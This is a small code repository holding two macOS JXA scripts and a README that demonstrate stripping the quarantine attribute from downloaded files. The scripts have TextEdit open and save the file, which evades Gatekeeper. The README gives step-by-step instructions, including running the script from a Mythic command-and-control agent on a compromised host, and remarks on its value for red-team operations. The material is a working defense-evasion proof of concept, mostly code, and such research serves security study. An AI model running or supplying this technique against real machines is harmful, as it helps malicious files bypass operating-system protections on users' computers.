```
├── LICENSE
├── README.md
├── remove-quarantine-Mythic.js
└── removequarantine.js
```

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2021, Cedric Owens
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# JXA-RemoveQuarantine

JXA script, based on research by Jeff Johnson, that uses TextEdit to remove the quarantine attribute from files. Jeff's original research is here: https://lapcatsoftware.com/articles/sandbox-escape.html

This script relies on:

1. The file extension being `.txt`. The file can be of any type as long as `.txt` is appended to the end of the name. The reason for this is that the script causes macOS to open the file with the default handler for `.txt` files (which is TextEdit), in order to leverage TextEdit's entitlement (`com.apple.security.files.user-selected.executable`), which gives it the ability to remove the quarantine attribute when the file is saved. I was unable to find a way to make the objc `withApplication:@TextEdit` call in JXA, so I used this method as a fallback to ensure TextEdit is opened.

2. Terminal having access to control TextEdit. If Terminal does not have this access, a pop-up will appear requesting permission for Terminal to control TextEdit.

This may not be feasible for red team ops, due to the brief pop-up that occurs when TextEdit opens the file as well as condition number 2 above. However, this is an interesting demo of how TextEdit can be leveraged to remove file quarantine attributes.

To run locally:

1. Download a test/target file from the browser, which will add the quarantine attribute.

2. Add the `.txt` extension to whatever your filename is (ex: if you are downloading `file.js`, rename it to `file.js.txt`).

3. Edit the `removequarantine.js` file and change the `NSWorkspace.sharedWorkspace.openFile` path value to your target file.

4. Run via Terminal:

   ```
   > osascript removequarantine.js
   ```

5. Check the quarantine attribute after step 3; it will have been removed by TextEdit (ex: `xattr [filename]`).

6. You can then rename your file back to the original name.

-------------

## Running via Mythic

You can run this via Mythic's `jsimport` function. However, **if you gain access via an Office macro, the sandbox seems to prevent TextEdit from writing the file after opening, which will cause this not to work** (even when I tried prepending `~$` to the front of the filename, this still did not work). If you have non-sandboxed access to a host, then this will work via Mythic.

Steps:

1. Edit the `remove-quarantine-Mythic.js` file and change the `NSWorkspace.sharedWorkspace.openFile` path value to your target file.

   Then from a Mythic agent run:

2. `> jsimport remove-quarantine-Mythic.js`

3. `> jsimport_call Remove()`

4. The quarantine attribute will be removed from the file.

--------------------------------------------------------------------------------
/remove-quarantine-Mythic.js:
--------------------------------------------------------------------------------
```javascript
function Remove() {
    ObjC.import('Cocoa');
    ObjC.import('stdlib');
    var app = Application.currentApplication();
    app.includeStandardAdditions = true;

    try {
        // Open the target (".txt" suffix) with the default handler, TextEdit; see README.
        $.NSWorkspace.sharedWorkspace.openFile("/Users/dev/Desktop/mypytest.py.txt");
        // Tell TextEdit to save the document it just opened and quit.
        var start = $.NSAppleScript.alloc.initWithSource("tell application \"TextEdit\"\rsave document 1\rquit\rend tell");
        start.executeAndReturnError($());

        return "Done";
    }
    catch (err) {
        return err;
    }
}
```

--------------------------------------------------------------------------------
/removequarantine.js:
--------------------------------------------------------------------------------
```javascript
ObjC.import('Cocoa');
ObjC.import('stdlib');

var app = Application.currentApplication();
app.includeStandardAdditions = true;

try {
    // Open the target (".txt" suffix) with the default handler, TextEdit; see README.
    $.NSWorkspace.sharedWorkspace.openFile("/Users/dev/Desktop/mypytest.py.txt");
    // Tell TextEdit to save the document it just opened and quit.
    var start = $.NSAppleScript.alloc.initWithSource("tell application \"TextEdit\"\rsave document 1\rquit\rend tell");
    start.executeAndReturnError($());
}
catch (err) {
    console.log(err);
}
```
--------------------------------------------------------------------------------